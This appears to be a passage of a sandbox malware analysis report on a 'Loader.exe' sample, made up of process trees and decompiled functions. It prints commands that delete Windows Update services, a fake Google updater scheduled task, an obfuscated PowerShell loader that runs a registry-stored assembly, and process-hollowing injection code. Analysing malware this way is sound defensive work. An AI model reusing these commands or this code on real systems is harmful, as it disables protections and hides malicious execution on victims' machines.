Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Imagebase:	0x7ff678c50000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 6896, Parent PID: 6504

General

Target ID:	41
Start time:	23:49:27
Start date:	07/11/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Imagebase:	0x7ff678c50000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 6916, Parent PID: 6504

General

Target ID:	42
Start time:	23:49:28
Start date:	07/11/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Imagebase:	0x7ff678c50000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 6960, Parent PID: 6504

General

Target ID:	45
Start time:	23:49:29
Start date:	07/11/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Imagebase:	0x7ff678c50000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 7024, Parent PID: 6504

General

Target ID:	46
Start time:	23:49:30
Start date:	07/11/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Imagebase:	0x7ff678c50000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: dialer.exePID: 7188, Parent PID: 2804

General

Target ID:	47
Start time:	23:49:51
Start date:	07/11/2022
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\dialer.exe
Imagebase:	0x7ff7e2d20000
File size:	36864 bytes
MD5 hash:	0EC74656A7F7667DD94C76081B111827
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7196, Parent PID: 2804

General

Target ID:	48
Start time:	23:49:52
Start date:	07/11/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
Imagebase:	0x7ff6f4710000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7228, Parent PID: 7196

General

Target ID:	49
Start time:	23:49:53
Start date:	07/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7384, Parent PID: 1100

General

Target ID:	50
Start time:	23:49:59
Start date:	07/11/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
Imagebase:	0xe60000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7392, Parent PID: 1100

General

Target ID:	51
Start time:	23:50:00
Start date:	07/11/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
Imagebase:	0x7ff6f4710000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7400, Parent PID: 7384

General

Target ID:	52
Start time:	23:50:00
Start date:	07/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7432, Parent PID: 7392

General

Target ID:	53
Start time:	23:50:01
Start date:	07/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 7616, Parent PID: 7196

General

Target ID:	54
Start time:	23:50:08
Start date:	07/11/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
Imagebase:
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Loader.exePID: 5244, Parent PID: 3320COMMON

Execution Graph

Execution Coverage:	5.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	53

Executed Functions

Function 00B14181 Relevance: 21.5, APIs: 11, Strings: 1, Instructions: 467
injectionmemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00B14462
GetThreadContext.KERNELBASE(?,00010007), ref: 00B14477
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00B14498
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00B144CA
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 00B144EA
WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000), ref: 00B1461D
VirtualProtectEx.KERNELBASE(?,?,?,00000002,?), ref: 00B1463A
VirtualProtectEx.KERNELBASE(?,?,?,00000001,?), ref: 00B146A4
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00B146C6
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00B146E1
SetThreadContext.KERNELBASE(?,00010007), ref: 00B146FE

Strings

D, xrefs: 00B143BA

Memory Dump Source

Source File: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: Virtual$Process$Memory$AllocContextProtectThreadWrite$CreateFreeRead
String ID: D
API String ID: 1154545702-2746444292
Opcode ID: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
Instruction ID: 274f5cc542a834695e81b1fc2dbcc09f6c9d955dd560f6f211dda0243d69b351
Opcode Fuzzy Hash: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
Instruction Fuzzy Hash: 40121771A002199BDF25CFA4DC84BEEBBF5FF04704F5484AAE509E6290E7749A84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00AE36C0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 104
librarymemoryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E00AE36C0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __ebp, void* __eflags, void* _a4, long _a8, long _a12, signed int _a16, void* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a80, intOrPtr _a88, intOrPtr _a92, signed int _a100) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v26;
				short _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* _t39;
				struct HINSTANCE__* _t58;
				void* _t86;
				signed char _t89;
				signed char _t90;
				CHAR* _t101;

				_t86 = __edx;
				_t101 =  &_v32;
				asm("cdq");
				_t39 = E00AE9080(_a12 * 0x101c, __edx, _a24, _a28);
				asm("sbb esi, ecx");
				asm("adc esi, [esp+0x58]");
				E00AE3260(0x19c, 0xb37bc8, _t39 - _a16 * 0x19c + _a24, _t39 - _a16 * 0x19c + _a24, _t86);
				_v40 = 0x393a5418;
				_t89 = 0;
				_v36 = 0x396c5035;
				_v32 = 0xdac82ae4;
				_v28 = 0xfdb;
				_v26 = 0x68;
				do {
					_t101[_t89 + 0x10] = ((0x00000067 - ( !(_t101[_t89 + 0x10] + _t89) ^ _t89) ^ 0x00000062) + _t89 ^ _t89 ^ 0x000000b7) - _t89 + _t89 + 0x00000001 ^ _t89;
					_t89 = _t89 + 1;
				} while (_t89 < 0xf);
				_v32 = 0xd911bffe;
				_t90 = 0;
				_v28 = 0x587819be;
				_v24 = 0x99581f00;
				_v20 = 0xc6;
				do {
					asm("rol cl, 0x3");
					asm("ror cl, 0x3");
					asm("rol al, 0x3");
					_t101[_t90] =  !(0x000000ad -  ~((0x00000097 - (_t101[_t90] ^ 0x000000b2) ^ _t90) - _t90 ^ 0x00000029) ^ 0x00000073);
					_t90 = _t90 + 1;
				} while (_t90 < 0xd);
				_t58 = GetModuleHandleA(_t101);
				_a12 = 0;
				 *0xb37a80 = GetProcAddress(_t58,  &_v16);
				VirtualProtect(_a4, _a8, 0x40,  &_a12); // executed
				return E00AE90C0(_a80, 0, _a88, _a92) ^ _a100;
			}

0x00ae36c0
0x00ae36c0
0x00ae36d2
0x00ae36d9
0x00ae36f9
0x00ae3704
0x00ae370a
0x00ae3711
0x00ae3719
0x00ae371b
0x00ae3723
0x00ae372b
0x00ae3732
0x00ae3738
0x00ae375a
0x00ae375e
0x00ae375f
0x00ae3764
0x00ae376b
0x00ae376d
0x00ae3775
0x00ae377d
0x00ae3782
0x00ae378d
0x00ae3799
0x00ae379e
0x00ae37a5
0x00ae37a8
0x00ae37a9
0x00ae37b2
0x00ae37bc
0x00ae37d0
0x00ae37e0
0x00ae3802

APIs

GetModuleHandleA.KERNEL32(-00000053), ref: 00AE37B2
GetProcAddress.KERNEL32(00000000,?), ref: 00AE37C6
VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 00AE37E0
__aulldiv.LIBCMT ref: 00AE37F0

Strings

h, xrefs: 00AE3732
5Pl9, xrefs: 00AE371B
`g)w, xrefs: 00AE37D0

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcProtectVirtual__aulldiv
String ID: 5Pl9$`g)w$h
API String ID: 2761706316-2372584761
Opcode ID: 340ed7ddd626f9000766af7a1bfda00469d51179a7d1a9b8b203456e42e13224
Instruction ID: 3fad20572dbb7093e83599acd72c0ca5aa5fdc0b54138ecc546db562ebdd0905
Opcode Fuzzy Hash: 340ed7ddd626f9000766af7a1bfda00469d51179a7d1a9b8b203456e42e13224
Instruction Fuzzy Hash: C631D375008350AFEB119F36C9546AFBFE5EBD6304F10991CF59483261D634850ADF53

Uniqueness

Uniqueness Score: -1.00%

Function 00AE9977 Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AE9977() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00AE9983); // executed
				return _t1;
			}

0x00ae997c
0x00ae9982

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00009983,00AE9203), ref: 00AE997C

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 472ed5cc05b5a07b4cdda8b1074d13bcd89ecab2fc82d4c40d2a37d5b0158023
Instruction ID: 87886b6195946f6e9e82664678b46b5c0a8f3e30714862280a09a2c0ca2bcc63
Opcode Fuzzy Hash: 472ed5cc05b5a07b4cdda8b1074d13bcd89ecab2fc82d4c40d2a37d5b0158023
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00AE6710 Relevance: 13.0, APIs: 4, Strings: 3, Instructions: 774
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00AE6710(signed char __ebx, void* __ecx, void* __edi, void* __esi, void* __ebp, void* __fp0, intOrPtr _a14223572, intOrPtr _a14223576, intOrPtr _a24760459, intOrPtr _a24760463) {
				signed char _v113;
				char _v120;
				intOrPtr _v125;
				intOrPtr _v129;
				signed int _v136;
				signed int _v140;
				struct HINSTANCE__* _t212;
				intOrPtr _t214;
				void* _t224;
				signed char _t230;
				signed char _t231;
				signed int _t239;
				signed char _t256;
				signed char _t262;
				signed int _t266;
				void* _t333;
				signed char _t335;
				signed char _t368;
				signed char _t436;
				signed char _t442;
				signed char _t456;
				signed int _t459;
				intOrPtr _t460;
				signed char _t465;
				signed int _t469;
				signed char _t470;
				signed char _t485;
				signed int _t509;
				void* _t525;
				void* _t530;
				void* _t535;
				void* _t560;
				void* _t561;
				signed char _t562;
				void* _t569;
				void* _t576;
				void* _t577;
				void* _t580;
				signed char _t585;
				signed char _t587;
				signed char _t597;
				signed char _t632;
				signed char _t642;
				signed char _t643;
				signed char _t673;
				signed char _t674;
				void* _t681;
				intOrPtr _t682;
				void* _t684;
				signed char _t685;
				void* _t687;
				void* _t718;

				_t718 = __fp0;
				_t687 = __ebp;
				_t684 = __esi;
				_t681 = __edi;
				_t456 = __ebx;
				_t689 =  &_v140;
				_t212 = GetModuleHandleA("ntdll.dll");
				if(_t212 != 0xffffffff) {
					GetProcAddress(_t212, "NtUnmapViewOfSection");
				} else {
					_push("Could not get a handle to ntdll.dll.");
					_push(0xb37c88);
					E00AE1420(__ebx, __ebp, E00AE1160(__ebx, __edi, __esi));
					_t689 =  &(( &_v140)[3]);
				}
				_t587 = _v113;
				asm("xorps xmm0, xmm0");
				_push(_t456);
				_push(_t687);
				_push(_t684);
				_v129 = 0x9fb1119b;
				_v125 = 0xafb0b15d;
				asm("movq [esp+0x1f], xmm0");
				_push(_t681);
				while(1) {
					L4:
					_t685 =  *0xb37aa0; // 0x0
					_t682 =  *0xb37aa4; // 0x0
					while(1) {
						_t459 = 0;
						while(1) {
							L6:
							_v136 = _t459;
							if(_t459 >= 0x10) {
								break;
							}
							_t456 =  *(_t689 + _t459 + 0x1b);
							_v140 = _t456 & 0x000000ff;
							asm("o16 nop [eax+eax]");
							L8:
							while(_t685 <= _t459) {
								_t8 = _t682 + 1; // 0x1
								if(_t685 >= _t8) {
									if(__eflags == 0) {
										_t198 = _t459 - 0x30225725; // -807556901
										_t224 = _t198;
										_t587 = _t224 + _t456 + 3;
										_t459 = _t459 + ( *(_t689 + _t459 + 0x1b) & 0x000000ff) + _t682 + 1;
										goto L6;
									} else {
										_t12 = _t682 + 2; // 0x2
										__eflags = _t685 - _t12;
										if(_t685 == _t12) {
											_t465 = _t459 + 0x3a5a89ff;
											_t230 = _t456 - (_v140 & _t465) + (_v140 & _t465) + 7;
											__eflags = _t230;
											goto L116;
										} else {
											_t13 = _t682 + 5; // 0x5
											__eflags = _t685 - _t13;
											if(_t685 == _t13) {
												_t587 = _t459 + 0xda15dbb5 + _t456 - (_v140 & _t459 + 0xda15dbb5) + (_v140 & _t459 + 0xda15dbb5) + 0xd;
												__eflags = _t587;
												goto L112;
											} else {
												_t14 = _t682 + 3; // 0x3
												_t687 = _t14;
												__eflags = _t685 - _t687;
												if(__eflags == 0) {
													_t256 = _t456 + _t459 + 0x47 - (_t459 + 0x00000047 & _t456) + (_t459 + 0x00000047 & _t456) + 0xf;
													_v140 = _t256;
													_t587 = _t256;
													_t459 = _v136 - 1 + 1;
													goto L6;
												} else {
													goto L16;
												}
											}
										}
									}
								} else {
									_t9 = _t459 - 0x6560c7b7; // -1700841399
									_t10 = _t682 + 3; // 0x3
									_t687 = _t10;
									_t587 = _t9 - (_t9 & _v140) + (_t9 & _v140) + 1 + _t456;
									L16:
									if(_t682 > _t459) {
										_t214 = _a24760459;
										_t460 = _a24760463;
									} else {
										_t15 = _t682 + 0x42; // 0x42
										if(_t685 >= _t15) {
											_t19 = _t682 + 1; // 0x1
											__eflags = _t685 - _t19;
											if(_t685 == _t19) {
												_t164 = _t459 - 0x1bb1f171; // -464646513
												_t262 = _t164 - (_v140 & _t164) + (_v140 & _t164) + 0x17 + _t456;
												__eflags = _t262;
												goto L109;
											} else {
												__eflags = _t685 - _t687;
												if(_t685 == _t687) {
													_t587 = _t456 + _t459 + 0x45 - (_t459 + 0x00000045 & _t456) + (_t459 + 0x00000045 & _t456) + 0x1d;
													goto L112;
												} else {
													_t20 = _t682 + 5; // 0x5
													__eflags = _t685 - _t20;
													if(_t685 == _t20) {
														_t587 = _t456 + _t459 - 0x29 - (_t459 - 0x00000029 & _t456) + (_t459 - 0x00000029 & _t456) + 0x1f;
														goto L113;
													} else {
														_t21 = _t682 + 7; // 0x7
														__eflags = _t685 - _t21;
														if(__eflags == 0) {
															_t587 = _t456 + _t459 + 0x1f - (_t459 + 0x0000001f & _t456) + (_t459 + 0x0000001f & _t456) + 0x27;
															_t459 = _v136 + ( *(_t689 + _v136 + 0x1b) & 0x000000ff) + _t682 + 1;
															goto L6;
														} else {
															goto L23;
														}
													}
												}
											}
										} else {
											_t585 = _t459 + 0xaf0f9dfd;
											_t459 = _v136;
											_t587 = _t456 + _t585 - (_v140 & _t585) + (_v140 & _t585) + 0x15;
											L23:
											if(_t682 + _t685 <= _t459) {
												_t99 = _t682 + 2; // 0x2
												__eflags = _t685 - _t99;
												if(_t685 >= _t99) {
													_t102 = _t682 + 1; // 0x1
													__eflags = _t685 - _t102;
													if(__eflags != 0) {
														__eflags = _t685 - _t687;
														if(__eflags != 0) {
															_t110 = _t682 + 2; // 0x2
															__eflags = _t685 - _t110;
															if(_t685 != _t110) {
																_t113 = _t682 + 5; // 0x5
																__eflags = _t685 - _t113;
																if(_t685 != _t113) {
																	goto L65;
																} else {
																	_t587 = _t456 + 0x1a - (_v140 & _t459 + 0x68576ed4) + 0x1a - (_v140 & _t459 + 0x68576ed4) + _t459 + 0x68576ed4;
																	goto L112;
																}
															} else {
																_t587 = _t456 + 0x19 - (_v140 & _t459 + 0x3318fe42) + 0x19 - (_v140 & _t459 + 0x3318fe42) + _t459 + 0x3318fe42;
																goto L113;
															}
														} else {
															_t587 = _t456 + 0x18 - (_v140 & _t459 + 0xfdda8db0) + 0x18 - (_v140 & _t459 + 0xfdda8db0) + _t459 + 0xfdda8db0;
															goto L114;
														}
													} else {
														_t587 = _t459 + 0x5e1f3bfa + 0x15 - (_v140 & _t459 + 0x5e1f3bfa) + 0x15 - (_v140 & _t459 + 0x5e1f3bfa) + _t456;
														_t459 = _v136 + ( *(_t689 + _v136 + 0x1b) & 0x000000ff) + _t682 + 1;
														goto L6;
													}
												} else {
													_t587 = _t456 + _t459 + 0x9a9f3849 - (_t459 + 0x9a9f3849 & _v140) + (_t459 + 0x9a9f3849 & _v140) + 1;
													goto L64;
												}
												goto L126;
											} else {
												while(1) {
													_t23 = _t682 + 0xa; // 0xa
													if(_t685 == _t23) {
														break;
													}
													_t24 = _t682 + 0x20; // 0x20
													if(_t685 == _t24) {
														_t682 = _t682 + 1;
														_t368 = 0x38 - (_v140 & _t459 + 0xa5a89ff0) + 0x38 - (_v140 & _t459 + 0xa5a89ff0) + _t456 + _t459 + 0xa5a89ff0;
														_v140 = _t368;
														_t587 = _t368;
														_t459 = _v136 - 1 + 1;
														goto L6;
													} else {
														_t25 = _t682 + 8; // 0x8
														if(_t685 == _t25) {
															_t587 = _t456 + 0x3a - (_v140 & _t459 + 0x10258114) + 0x3a - (_v140 & _t459 + 0x10258114) + _t459 + 0x10258114;
															goto L112;
														} else {
															_t26 = _t682 + 5; // 0x5
															if(_t685 == _t26) {
																_t587 = _t456 + 0x3b - (_v140 & _t459 + 0x4563f1a6) + 0x3b - (_v140 & _t459 + 0x4563f1a6) + _t459 + 0x4563f1a6;
																goto L113;
															} else {
																_t27 = _t682 + 3; // 0x3
																if(_t685 == _t27) {
																	_t89 = _t459 + 0x38; // 0x38
																	_t587 = _t89 + 0x3c;
																	goto L114;
																} else {
																	_t28 = _t682 + 1; // 0x1
																	if(_t685 == _t28) {
																		_t85 = _t459 - 0x12; // -18
																		_t587 = _t85 + 0x3f;
																		_t459 = _v136 + ( *(_t689 + _v136 + 0x1b) & 0x000000ff) + _t682 + 1;
																		goto L6;
																	} else {
																		_t29 = _t682 + 0x5a; // 0x5a
																		if(_t685 == _t29) {
																			continue;
																		} else {
																			_t30 = _t682 + 0x2a; // 0x2a
																			_t685 = _t30;
																			_t31 = _t685 + 0x7a; // 0xa4
																			_t682 = _t31;
																			_t32 = _t682 + 0x41; // 0xe5
																			if(_t685 < _t32) {
																				_t560 = _t459 + 0x5b;
																				_t587 = _t560 + _t456 - 0x7d;
																				goto L4;
																			} else {
																				_t33 = _t682 + 0x61; // 0x105
																				if(_t685 < _t33) {
																					_t561 = _t459 - 0x13;
																					_t587 = _t561 + _t456 - 0x7b;
																					_t459 = 0;
																					goto L6;
																				} else {
																					_t34 = _t682 + 0x400; // 0x4a4
																					if(_t685 < _t34) {
																						_t562 = _t459 + 0x7f;
																						_t459 = _v136;
																						_t587 = _t456 + _t562 - (_t562 & _t456) + (_t562 & _t456) - 0x79;
																						goto L8;
																					} else {
																						_t35 = _t682 + 0x200; // 0x2a4
																						if(_t685 < _t35) {
																							_t79 = _t459 + 0x35; // 0x35
																							_t587 = _t79 + _t456 - (_t456 & _t79) + (_t456 & _t79) - 0x73;
																							__eflags = _t587;
																							L64:
																							_t459 = _v136;
																							L65:
																							__eflags = _t682 + _t685 - 0x42;
																							if(_t682 + _t685 == 0x42) {
																								_t465 = _t459 + 0x5ed4e3a;
																								_t230 = 0x35 - (_v140 & _t465) + 0x35 - (_v140 & _t465);
																								goto L116;
																							} else {
																								_t82 = _t682 + 0x64; // 0x64
																								__eflags = _t685 - _t82;
																								if(_t685 <= _t82) {
																									_t116 = _t682 + 1; // 0x1
																									__eflags = _t685 - _t116;
																									if(__eflags != 0) {
																										_t119 = _t682 + 2; // 0x2
																										__eflags = _t685 - _t119;
																										if(__eflags != 0) {
																											_t123 = _t682 + 3; // 0x3
																											__eflags = _t685 - _t123;
																											if(__eflags != 0) {
																												_t125 = _t682 + 6; // 0x6
																												__eflags = _t685 - _t125;
																												if(_t685 != _t125) {
																													_t128 = _t682 + 4; // 0x4
																													__eflags = _t685 - _t128;
																													if(__eflags != 0) {
																														goto L60;
																													} else {
																														_t129 = _t459 - 0xb; // -11
																														_t470 = _v136;
																														_v140 = _t129 + _t456 - (_t456 & _t129) + (_t456 & _t129) + 0x4d;
																														goto L118;
																													}
																												} else {
																													_t126 = _t459 + 0x63; // 0x63
																													_t231 = _t126 + _t456 - (_t456 & _t126) + (_t456 & _t126) + 0x4b;
																													goto L117;
																												}
																											} else {
																												_t530 = _t459 - 0x2f;
																												_t587 = _t530 + _t456 + 0x49;
																												goto L114;
																											}
																										} else {
																											_t121 = _t459 + 0x77abbb1b; // 0x77abbb1b
																											_t333 = _t121;
																											_t335 = _t333 + 0x43 + _t456;
																											_t459 = _t459 - 1 + 1;
																											_v140 = _t335;
																											_t587 = _t335;
																											goto L6;
																										}
																									} else {
																										_t262 = _t456 - (_v140 & _t459 + 0x0d2ed9f7) + (_v140 & _t459 + 0x0d2ed9f7) + _t459 + 0xd2eda36;
																										_t459 = _v136;
																										goto L109;
																									}
																								} else {
																									_t84 = _t459 - 0x280f969b; // -672110235
																									_t642 = _t84;
																									_t535 = _t456 - (_v140 & _t642) + (_v140 & _t642);
																									_t643 = _t642 + 0x3d;
																									goto L59;
																								}
																							}
																							goto L126;
																						} else {
																							_t36 = _t682 + 0x64; // 0x108
																							if(_t685 < _t36) {
																								_t75 = _t459 - 0x39; // -57
																								_t673 = _t75;
																								_t535 = _t456 - (_t456 & _t673) + (_t456 & _t673);
																								_t643 = _t673 - 0x71;
																								__eflags = _t643;
																								L59:
																								_t587 = _t643 + _t535;
																								__eflags = _t587;
																								L60:
																								__eflags = _t685 - 3;
																								if(_t685 >= 3) {
																									_t587 = _t456 - (_v140 & _v136 + 0xd0aedda8) + 0x34 + _t456 - (_v140 & _v136 + 0xd0aedda8) + 0x34 + _v136 + 0xd0aedda8;
																									L112:
																									_t485 = _v136 - 0xf - (_v136 - 0x0000000f & _t456) + (_v136 - 0x0000000f & _t456) + 0x69 + _t456 + _t587;
																									__eflags = _t485;
